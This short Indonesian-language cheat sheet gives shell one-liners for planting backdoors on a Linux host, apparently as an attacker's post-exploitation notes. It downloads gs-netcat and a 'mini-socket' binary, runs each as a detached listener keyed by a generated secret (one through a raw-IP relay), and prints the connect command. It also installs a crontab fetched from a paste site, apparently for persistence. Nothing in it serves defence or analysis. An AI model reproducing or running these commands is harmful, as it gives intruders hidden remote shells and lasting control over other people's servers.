=> HOST GSOCKET

wget -O gs https://github.com/hackerschoice/gsocket/releases/latest/download/gs-netcat_linux-x86_64

chmod 755 gs && S=$(./gs -g) && GS_HOST=168.144.111.89 GSOCKET_ARGS="-liD -s $S" ./gs && echo "Connect with: gs-netcat -s $S -i" && rm -f gs


=> MINI SOCKET

( RUNNING DI TERMINAL SHELL )
curl -fsSLk -oms https://github.com/minisocket/minisocket/releases/download/v0.3/mini-socket_linux-x86_64 && chmod 755 ms && S=$(./ms -g) && MINI_ARGS="-s $S -d" ./ms && echo "Connect with: mini-nc -s $S" && rm -rf ms

( INSTALL DI VPS )
wget -O /usr/bin/mini-nc https://minisocket.io/bin/mini-nc

chmod +x /usr/bin/mini-nc


=> CRONTAB

( curl https://paste.mangsud.org/raw/d2142e22; echo "" ) | crontab -

( ISI PERINTAH CRONTAB )
https://paste.mangsud.org/raw/d2142e22

